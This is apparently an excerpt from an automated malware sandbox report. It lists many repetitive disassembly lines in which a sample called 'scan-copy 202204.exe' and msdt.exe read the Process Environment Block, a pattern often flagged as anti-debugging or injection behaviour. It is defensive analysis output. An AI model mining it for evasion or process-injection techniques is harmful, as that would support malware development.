            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013A6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013A6DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013A6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013A6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0135BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013A6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013A6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013A6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013A6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013F740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013F740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013F740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013E1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013E1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013E1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013E1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013E1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013E1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013E1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013E1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013E1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013E1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013E1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013E1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013E1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013E1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0134746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013BC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013BC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0135A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0133849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013E14FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013A6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013A6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013A6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013F8CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0135E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01324F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01324F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0134F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013BFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013BFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013F070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013F070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0135A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0135A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0133FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013F8F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0133EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01338794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013A7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013A7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013A7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013637F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013DFE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0132E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0135A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0135A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0132C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0132C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0132C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01358E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013E1608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0134AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0134AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0134AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0134AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0134AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0133766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01337E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01337E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01337E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01337E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01337E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01337E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013EAE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013EAE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013F0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013F0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013F0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013A46A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013BFE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013376E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013516E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013F8ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01368EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013536CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013DFEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DF14FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DB6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DB6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DB6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04E08CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D4849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DCC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DCC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D5746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DB6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DB6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DB6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DB6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DF1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DF1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DF1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DF1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DF1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DF1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DF1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DF1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DF1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DF1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DF1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DF1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DF1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DF1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04E0740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04E0740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04E0740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DB6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DB6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DB6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DB6DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DB6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DB6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DE8DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D4D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D4D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DFFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DFFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DFFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DFFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04E005AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04E005AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D62581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D62581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D62581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D62581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D32D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D32D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D32D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D32D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D32D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D635A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D57D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D73D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DB3540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D5C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D5C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04E08D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D43D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D43D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D43D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D43D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D43D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D43D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D43D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D43D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D43D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D43D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D43D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D43D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D43D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DFE539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DBA537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D64D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D64D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D64D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D78EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D636CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DEFEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04E08ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D616E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D476E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04E00EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04E00EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04E00EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DCFE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DB46A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D47E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D47E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D47E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D47E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D47E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D47E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DFAE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DFAE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D5AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D5AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D5AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D5AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D5AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D4766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D68E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DF1608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DEFE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D737F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D48794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DB7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DB7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DB7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04E08F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D4EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D4FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D5F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DCFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DCFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04E0070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04E0070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D34F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D34F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DCB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DCB8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DCB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DCB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DCB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DCB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D358EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D39080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DB3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DB3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D620A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D620A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D620A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D620A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D620A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D620A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D790AF mov eax, dword ptr fs:[00000030h]
